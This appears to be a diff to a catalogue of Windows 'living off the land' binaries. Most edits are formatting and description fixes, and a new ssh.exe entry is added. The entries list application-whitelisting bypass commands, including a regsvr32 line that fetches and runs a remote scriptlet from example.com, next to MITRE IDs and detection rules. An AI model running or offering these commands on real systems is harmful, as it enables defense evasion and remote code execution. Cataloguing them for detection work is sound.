    Usecase: Execute dll file and bypass Application whitelisting
-    Category: AWL bypass
-    Privileges: User
+    Category: AWL Bypass
+    Privileges: Local Admin
    MitreID: T1218.009
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 Full_Path:
@ -34,4 +34,3 @@ Resources:
 Acknowledgement:
  - Person: Casey Smith
    Handle: '@subtee'
---
--- a/yml/OSBinaries/Regsvr32.yml
+++ b/yml/OSBinaries/Regsvr32.yml
@ -7,14 +7,14 @@ Commands:
  - Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
    Description: Execute the specified remote .SCT script with scrobj.dll.
    Usecase: Execute code from remote scriptlet, bypass Application whitelisting
-    Category: AWL bypass
+    Category: AWL Bypass
    Privileges: User
    MitreID: T1218.010
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
  - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll
    Description: Execute the specified local .SCT script with scrobj.dll.
    Usecase: Execute code from scriptlet, bypass Application whitelisting
-    Category: AWL bypass
+    Category: AWL Bypass
    Privileges: User
    MitreID: T1218.010
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
@ -36,7 +36,7 @@ Full_Path:
  - Path: C:\Windows\System32\regsvr32.exe
  - Path: C:\Windows\SysWOW64\regsvr32.exe
 Code_Sample:
- - Code:
+  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/6fbce11094285e5ba13fe101b9cb70f5b1ece198/rules/windows/process_creation/win_susp_regsvr32_anomalies.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/6d56e400d209daa77a7900d950a7c587dc0cd2e5/rules/windows/network_connection/sysmon_regsvr32_network_activity.yml
@ -57,4 +57,3 @@ Resources:
 Acknowledgement:
  - Person: Casey Smith
    Handle: '@subtee'
---
--- a/yml/OSBinaries/Replace.yml
+++ b/yml/OSBinaries/Replace.yml
@ -32,4 +32,3 @@ Resources:
 Acknowledgement:
  - Person: elceef
    Handle: '@elceef'
---
--- a/yml/OSBinaries/Rpcping.yml
+++ b/yml/OSBinaries/Rpcping.yml
@ -39,4 +39,3 @@ Acknowledgement:
    Handle: '@splinter_code'
  - Person: ap
    Handle: '@decoder_it'
---
--- a/yml/OSBinaries/Rundll32.yml
+++ b/yml/OSBinaries/Rundll32.yml
@ -80,6 +80,7 @@ Resources:
  - Link: https://github.com/sailay1996/expl-bin/blob/master/obfus.md
  - Link: https://github.com/sailay1996/misc-bin/blob/master/rundll32.md
  - Link: https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90
+  - Link: https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code
 Acknowledgement:
  - Person: Casey Smith
    Handle: '@subtee'
@ -91,4 +92,3 @@ Acknowledgement:
    Handle: '@404death'
  - Person: Martin Ingesen
    Handle: '@Mrtn9'
---
--- a/yml/OSBinaries/Runonce.yml
+++ b/yml/OSBinaries/Runonce.yml
@ -1,6 +1,6 @@
 ---
 Name: Runonce.exe
-Description:
+Description: Executes a Run Once Task that has been configured in the registry
 Author: 'Oddvar Moe'
 Created: 2018-05-25
 Commands:
@ -27,4 +27,3 @@ Resources:
 Acknowledgement:
  - Person: Pierre-Alexandre Braeken
    Handle: '@pabraeken'
---
--- a/yml/OSBinaries/Runscripthelper.yml
+++ b/yml/OSBinaries/Runscripthelper.yml
@ -1,6 +1,6 @@
 ---
 Name: Runscripthelper.exe
-Description:
+Description: Execute target PowerShell script
 Author: 'Oddvar Moe'
 Created: 2018-05-25
 Commands:
@ -18,7 +18,7 @@ Code_Sample:
  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_runscripthelper.yml
-  - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules 
+  - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
  - IOC: Event 4014 - Powershell logging
  - IOC: Event 400
 Resources:
@ -26,4 +26,3 @@ Resources:
 Acknowledgement:
  - Person: Matt Graeber
    Handle: '@mattifestation'
---
--- a/yml/OSBinaries/Sc.yml
+++ b/yml/OSBinaries/Sc.yml
@ -36,4 +36,3 @@ Resources:
 Acknowledgement:
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'
---
--- a/yml/OSBinaries/Schtasks.yml
+++ b/yml/OSBinaries/Schtasks.yml
@ -33,4 +33,3 @@ Resources:
 Acknowledgement:
  - Person:
    Handle:
---
--- a/yml/OSBinaries/Scriptrunner.yml
+++ b/yml/OSBinaries/Scriptrunner.yml
@ -1,6 +1,6 @@
 ---
 Name: Scriptrunner.exe
-Description:
+Description: Execute binary through proxy binary to evade defensive counter measures
 Author: 'Oddvar Moe'
 Created: 2018-05-25
 Commands:
@ -33,4 +33,3 @@ Resources:
 Acknowledgement:
  - Person: Nick Tyrer
    Handle: '@nicktyrer'
---
--- a/yml/OSBinaries/SettingSyncHost.yml
+++ b/yml/OSBinaries/SettingSyncHost.yml
@ -31,4 +31,3 @@ Acknowledgement:
    Handle: '@hexacorn'
  - Person: Elliot Killick
    Handle: '@elliotkillick'
---
--- a/yml/OSBinaries/Ssh.yml
+++ b/yml/OSBinaries/Ssh.yml
@ -0,0 +1,27 @@
+---
+Name: ssh.exe
+Description: Ssh.exe is the OpenSSH compatible client can be used to connect to Windows 10 (build 1809 and later) and Windows Server 2019 devices.
+Author: 'Akshat Pradhan'
+Created: '2021-11-08'
+Commands:
+  - Command: ssh localhost calc.exe
+    Description: Execute calc.exe on host machine. The prompt for password can be eliminated by adding the host's public key in the user's authorized_keys file. Adversaries can do the same for execution on remote machines.
+    Usecase: Execute specified command, can be used for defense evasion.
+    Category: Execute
+    Privileges: User
+    MitreID: T1202
+    OperatingSystem: Windows 10 1809, Windows Server 2019
+  - Command: ssh localhost calc.exe
+    Description: Executes calc.exe.
+    Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting.
+    Category: AWL Bypass
+    Privileges: User
+    MitreID: T1218
+    OperatingSystem: Windows 10 1809, Windows Server 2019
+Full_Path:
+  - Path: c:\windows\system32\OpenSSH\ssh.exe
+Detection:
+  - IOC: Event ID 4624 with process name C:\Windows\System32\OpenSSH\sshd.exe.
+  - IOC: command line arguments specifying execution.
+Acknowledgement:
+  - Person: Akshat Pradhan
--- a/yml/OSBinaries/Stordiag.yml
+++ b/yml/OSBinaries/Stordiag.yml
@ -22,4 +22,3 @@ Resources:
 Acknowledgement:
  - Person: Eral4m
    Handle: '@eral4m'
---
--- a/Show More
+++ b/Show More